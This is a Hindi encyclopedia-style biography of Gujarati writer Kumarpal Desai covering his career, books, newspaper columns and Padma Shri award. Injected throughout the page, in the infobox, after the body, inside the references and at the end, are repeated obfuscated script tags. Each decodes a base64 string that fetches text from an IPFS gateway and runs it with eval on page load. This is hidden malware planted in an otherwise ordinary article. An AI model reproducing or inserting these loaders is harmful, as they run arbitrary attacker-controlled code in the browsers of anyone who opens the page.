कुमारपाल देसाई

भारत डिस्कवरी प्रस्तुति
यहाँ जाएँ:भ्रमण, खोजें
कुमारपाल देसाई
कुमारपाल देसाई
पूरा नाम कुमारपाल बालाभाई देसाई
जन्म 30 अगस्त, 1942
जन्म भूमि रणपुर, गुजरात
पति/पत्नी प्रतिमा
संतान दो पुत्र
कर्म भूमि भारत
कर्म-क्षेत्र लेखन
विषय जीवनी, आलोचना, शोध, अनुवाद, उपन्यास, धर्म और बच्चों का साहित्य
भाषा गुजराती
पुरस्कार-उपाधि पद्म श्री, 2004
प्रसिद्धि लेखक, आलोचक, संपादक, पत्रकार, स्तंभकार और अनुवादक
नागरिकता भारतीय
अन्य जानकारी पत्रकारिता के क्षेत्र में वे पिछले पचास वर्षों से सक्रिय हैं और उनका योगदान उल्लेखनीय रहा है। उनके पांच साप्ताहिक कॉलम 'इंत अने इमारत', 'झकाल बन्यु मोती', 'पांडडू अने पिरामिड', 'आकाश नी ओलख' और 'पारिजात नो पेरिससंवाद' बेहद लोकप्रिय रहे हैं।
अद्यतन‎ <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>
इन्हें भी देखें कवि सूची, साहित्यकार सूची

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

कुमारपाल बालाभाई देसाई (अंग्रेज़ी: Kumarpal Balabhai Desai, जन्म- 30 अगस्त, 1942, रणपुर, गुजरात) प्रसिद्ध लेखक, आलोचक, संपादक, पत्रकार, स्तंभकार और अनुवादक हैं। डॉ. कुमारपाल देसाई ने पांच दशकों की अवधि में न केवल गुजरात या देश में बल्कि अंतर्राष्ट्रीय स्तर पर भी प्रेरणादायक, आध्यात्मिक और मूल्य समृद्ध साहित्य के लेखक के रूप में जबरदस्त प्रतिष्ठा हासिल की है। विशेष रूप से साहित्य, शिक्षा और पत्रकारिता के क्षेत्र में और सामान्य रूप से समाज में उनका योगदान उल्लेखनीय रहा है। उन्होंने सौ से अधिक किताबें लिखी हैं, जिनमें जीवनी, आलोचना, शोध, अनुवाद, उपन्यास, धर्म और बच्चों का साहित्य शामिल है। उनकी पांच पुस्तकों को केंद्र सरकार से पुरस्कार मिला है और चार को राज्य सरकार से पुरस्कार मिला है।

कार्यक्षेत्र

कुमारपाल देसाई, गुजरात विश्वविद्यालय के स्कूल ऑफ लैंग्वेजेज के निदेशक और गुजरात विश्वविद्यालय के कला संकाय के डीन के पद से सेवानिवृत्त हुए। वर्तमान में वह जैन विश्व भारती संस्थान में प्रोफेसर हैं। साहित्य परिषद के पूर्व अध्यक्ष कुमारपाल देसाई ने जीवनी, आलोचना, शोध, दर्शन, अनुवाद, कहानियाँ और जैन दर्शन पर गुजराती, हिंदी और अंग्रेज़ी में लगभग 125 पुस्तकें लिखी हैं।[1]

लेखन कार्य

कुमारपाल देसाई की पुस्तक 'नानी उमर, मोटू काम' को भारत की सभी भाषाओं में सर्वश्रेष्ठ बच्चों की किताब घोषित किया गया। लाल बहादुर शास्त्री की उनकी जीवनी 'लाल गुलाब' की एक बार में 60,000 प्रतियां बिकीं। उनकी पीएच.डी. थीसिस 'महायोगी आनंदघन' पर थी जो उनके 400 पांडुलिपियों पर शोध का परिणाम था। उनके व्यापक शोध पर आधारित तीन पुस्तकें भी प्रकाशित हो चुकी हैं।

'गुजरात साहित्य परिषद' के पूर्व अध्यक्ष, कुमारपाल देसाई अपनी तरह के पहले गुजराती विश्वकोश 'विश्वकोश' के प्रबंध ट्रस्टी हैं और गुजरात साहित्य सभा के अध्यक्ष भी हैं। डॉ. देसाई ने 38 वर्षों तक गुजराती साहित्य पढ़ाया और गुजरात विश्वविद्यालय के कला संकाय के डीन और स्कूल ऑफ लैंग्वेजेज के निदेशक के रूप में सेवानिवृत्त हुए। वह गुजरात विश्वविद्यालय के गुजराती विभाग के प्रमुख भी थे। 20 छात्रों ने अपनी पीएच.डी. हासिल की है। उसके अधीन डिग्री. उन्हें पीएच.डी. होने का अद्वितीय गौरव प्राप्त है। चार विषयों में मार्गदर्शन- साहित्य, पत्रकारिता, जैन दर्शन और शांति-संबंधी अनुसंधान।[1]

पत्रकारिता

पत्रकारिता के क्षेत्र में वे पिछले पचास वर्षों से सक्रिय हैं और उनका योगदान उल्लेखनीय रहा है। उनके पांच साप्ताहिक कॉलम 'इंत अने इमारत', 'झकाल बन्यु मोती', 'पांडडू अने पिरामिड', 'आकाश नी ओलख' और 'पारिजात नो पेरिससंवाद' बेहद लोकप्रिय रहे हैं। उन्होंने पत्रकारिता पर दो मौलिक पुस्तकें लिखी हैं-

  1. अखबारी लेखन
  2. साहित्य अने पत्रकारितात्व

यदि एक लेखक के रूप में डॉ. कुमारपाल देसाई ने अपनी एक अलग पहचान बनाई है, तो एक प्रतिभाशाली वक्ता के रूप में उन्होंने इंग्लैंड, अमेरिका, पूर्वी अफ्रीका, कनाडा, सिंगापुर, बेल्जियम, हांगकांग और दुबई में भारतीय संस्कृति और जैन दर्शन पर व्यापक व्याख्यान दिए हैं। पर्युषण पर्व के दौरान उनकी काफी मांग रहती है और उन्हें अक्सर व्याख्यान श्रृंखला के लिए इन देशों में आमंत्रित किया जाता है।

कुमारपाल देसाई के पिता जयभिक्खु ने 1953 में 'आइंट अने इमारत' शीर्षक से एक कॉलम शुरू किया था। 1969 में उनके निधन के बाद डॉ. कुमारपाल देसाई ने लेखन का कार्यभार संभाला। आज भी वह उसी कॉलम के लिए लिखते रहते हैं। पत्रकारिता के इतिहास में यह निश्चित ही एक अनोखा उदाहरण है कि एक पिता और पुत्र 67 वर्षों से लगातार एक कॉलम लिख रहे हैं।[2]

बहुआयामी व्यक्तित्व

प्रसिद्ध लेखक जयभिक्खु के पुत्र डॉ. कुमारपाल देसाई एक बहुआयामी व्यक्तित्व के धनी हैं और उन्होंने व्यापक क्षेत्रों में उत्कृष्ट प्रदर्शन किया है। उन्होंने लेखकों, सामाजिक कार्यकर्ताओं और विचारकों के समूह में अपने लिए एक उचित स्थान अर्जित किया है। उनके चार दशकों के शानदार कॅरियर को सर्वोच्च गौरव प्रदान करते हुए, भारत सरकार ने उन्हें तत्कालीन राष्ट्रपति ए.पी.जे. अब्दुल कलाम के हाथों शिक्षा, साहित्य और संस्कृति में उनके अमूल्य योगदान के लिए 26 जनवरी, 2004 को प्रतिष्ठित पद्म श्री पुरस्कार से सम्मानित किया। दर्शनशास्त्र, अनुसंधान, पत्रकारिता आदि में इस साहित्यकार ने लेखकों, सामाजिक कार्यकर्ताओं और विचारकों के समूह में अपने लिए एक उचित स्थान अर्जित किया है। उनकी जबरदस्त वक्तृत्व कला गुजराती जैनियों के बीच अद्वितीय है।[1]


पन्ने की प्रगति अवस्था
आधार
प्रारम्भिक
माध्यमिक
पूर्णता
शोध

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script> <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

टीका टिप्पणी और संदर्भ

  1. 1.0 1.1 1.2 कुमारपाल देसाई (हिंदी) jainavenue.org। अभिगमन तिथि: 05 जुलाई, 2023।<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>
  2. डॉ. कुमारपाल देसाई को विश्व गुजराज समाज के गुजरात प्रतिभा पुरस्कार से सम्मानित किया गया (हिंदी) jainology.org। अभिगमन तिथि: 05 जुलाई, 2023।<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

संबंधित लेख

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>